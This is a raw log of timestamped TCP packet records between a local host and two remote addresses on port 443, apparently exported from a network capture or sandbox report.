                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.130883932 CET44349774104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.130907059 CET44349774104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.130976915 CET49774443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.130995035 CET44349774104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.131006956 CET49774443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.131067991 CET49774443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.131164074 CET49784443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.131232977 CET44349784104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.131429911 CET49784443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.131453991 CET44349784104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.132756948 CET44349774104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.132843971 CET44349774104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.132889032 CET49774443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.132889032 CET49774443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.133603096 CET49774443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.133603096 CET49774443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.133626938 CET44349774104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.133708000 CET49774443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.136215925 CET44349785104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.136939049 CET49785443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.136969090 CET44349785104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.137357950 CET44349785104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.138212919 CET49785443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.138287067 CET44349785104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.138406038 CET49785443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.150710106 CET49773443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.183341026 CET44349785104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.184686899 CET49784443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.205404997 CET44349786104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.205784082 CET49786443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.205796003 CET44349786104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.206856966 CET44349786104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.207000971 CET49786443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.207339048 CET49786443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.207398891 CET44349786104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.207525969 CET49786443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.222474098 CET44349783104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.222759962 CET49783443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.222783089 CET44349783104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.223134995 CET44349783104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.223578930 CET49783443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.223647118 CET44349783104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.223732948 CET49783443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.239854097 CET44349773104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.239886045 CET44349773104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.239933014 CET49773443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.239950895 CET44349773104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.239996910 CET49773443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.239996910 CET49773443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.244261980 CET44349787104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.244518995 CET49787443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.244529963 CET44349787104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.244868994 CET44349787104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.245264053 CET49787443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.245328903 CET44349787104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.245436907 CET49787443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.246570110 CET44349773104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.246592045 CET44349773104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.246638060 CET49773443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.246650934 CET44349773104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.246690989 CET49773443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.246690989 CET49773443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.255265951 CET44349773104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.255286932 CET44349773104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.255321026 CET49773443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.255336046 CET44349786104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.255338907 CET44349773104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.255389929 CET49773443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.255389929 CET49773443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.261152983 CET49786443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.261163950 CET44349786104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.263570070 CET44349773104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.263592958 CET44349773104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.263660908 CET49773443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.263673067 CET44349773104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.263839006 CET49773443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.271337032 CET44349783104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.272070885 CET44349773104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.272097111 CET44349773104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.272169113 CET49773443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.272181988 CET44349773104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.272192955 CET49773443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.272253036 CET49773443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.280015945 CET44349773104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.280035019 CET44349773104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.280117035 CET49773443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.280133009 CET44349773104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.280152082 CET49773443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.280272961 CET49773443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.287362099 CET44349787104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.287399054 CET44349773104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.287417889 CET44349773104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.287471056 CET49773443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.287478924 CET44349773104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.287683964 CET49773443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.290575027 CET49789443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.290605068 CET44349789104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.290659904 CET49789443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.290896893 CET49789443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.290909052 CET44349789104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.295970917 CET44349773104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.295989037 CET44349773104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.296173096 CET49773443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.296173096 CET49773443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.296190023 CET44349773104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.296269894 CET49773443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.307409048 CET49786443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.323550940 CET44349780104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.323621988 CET44349780104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.323704958 CET44349780104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.323756933 CET49780443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.323820114 CET49780443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.325460911 CET49780443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.325480938 CET44349780104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.365195036 CET44349781104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.365377903 CET44349781104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.365452051 CET44349781104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.365559101 CET44349781104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.365587950 CET44349781104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.365675926 CET49781443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.365705013 CET49781443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.365722895 CET44349781104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.365886927 CET49781443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.372955084 CET44349781104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.380937099 CET44349781104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.380968094 CET44349781104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.381010056 CET49781443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.381016016 CET44349781104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.381143093 CET49781443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.387852907 CET44349781104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.411588907 CET44349782104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.411688089 CET44349782104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.411722898 CET44349782104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.411765099 CET44349782104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.411793947 CET49782443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.411803007 CET44349782104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.411814928 CET44349782104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.411834955 CET49782443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.411863089 CET49782443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.411869049 CET44349782104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.411952019 CET44349782104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.412075043 CET49782443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.412986040 CET49782443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.413002968 CET44349782104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.433806896 CET49781443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.434652090 CET44349779104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.434717894 CET44349779104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.434750080 CET44349779104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.434778929 CET44349779104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.434791088 CET49779443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.434803963 CET44349779104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.434818029 CET44349779104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.434839010 CET49779443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.434856892 CET49779443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.434861898 CET44349779104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.441533089 CET44349773104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.441559076 CET44349773104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.441610098 CET49773443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.441629887 CET44349773104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.441670895 CET49773443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.441670895 CET49773443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.442490101 CET44349779104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.442552090 CET49779443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.442560911 CET44349779104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.448050022 CET44349773104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.448069096 CET44349773104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.448259115 CET49773443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.448276043 CET44349773104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.448338985 CET49773443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.456372023 CET44349773104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.456388950 CET44349773104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.456459045 CET49773443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.456476927 CET44349773104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.456653118 CET49773443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.459461927 CET44349779104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.459496975 CET44349779104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.459527969 CET49779443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.459539890 CET44349779104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.459598064 CET44349779104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.459614038 CET49779443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.459652901 CET49779443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.460052967 CET49779443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.460071087 CET44349779104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.465482950 CET44349773104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.465502024 CET44349773104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.465595961 CET49773443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.465595961 CET49773443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.465615034 CET44349773104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.465687037 CET49773443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.473320007 CET44349773104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.473336935 CET44349773104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.473421097 CET49773443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.473439932 CET44349773104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.474247932 CET49773443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.475270033 CET49790443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.475308895 CET44349790104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.475423098 CET49790443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.475821018 CET49790443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.475843906 CET44349790104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.480691910 CET44349773104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.480720043 CET44349773104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.480832100 CET49773443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.480844975 CET44349773104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.480904102 CET49773443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.484922886 CET44349781104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.487961054 CET44349773104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.487979889 CET44349773104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.488037109 CET49773443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.488053083 CET44349773104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.488079071 CET49773443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.488107920 CET49773443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.496649027 CET44349773104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.496670008 CET44349773104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.496732950 CET49773443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.496754885 CET44349773104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.496769905 CET49773443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.496794939 CET49773443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.526627064 CET49781443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.526635885 CET44349781104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.554224014 CET44349781104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.554338932 CET49781443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.554347992 CET44349781104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.562275887 CET44349781104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.562432051 CET49781443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.562442064 CET44349781104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.568648100 CET44349781104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.568718910 CET49781443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.568725109 CET44349781104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.584325075 CET44349781104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.584358931 CET44349781104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.584395885 CET49781443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.584402084 CET44349781104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.584572077 CET49781443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.592322111 CET44349781104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.595913887 CET44349785104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.595992088 CET44349785104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.596220016 CET49785443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.596554995 CET49785443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.596554995 CET49785443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.596580029 CET44349785104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.596668005 CET49785443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.598210096 CET49791443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.598237991 CET44349791104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.598355055 CET49791443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.598627090 CET49791443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.598642111 CET44349791104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.600291967 CET44349781104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.600326061 CET44349781104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.600426912 CET49781443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.600434065 CET44349781104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.600542068 CET49781443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.608144045 CET44349781104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.616234064 CET44349781104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.616389990 CET49781443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.616395950 CET44349781104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.617369890 CET44349784104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.617439985 CET44349784104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.617470980 CET44349784104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.617496967 CET49784443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.617513895 CET44349784104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.617553949 CET44349784104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.617578983 CET49784443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.617583036 CET44349784104.16.102.112192.168.2.12
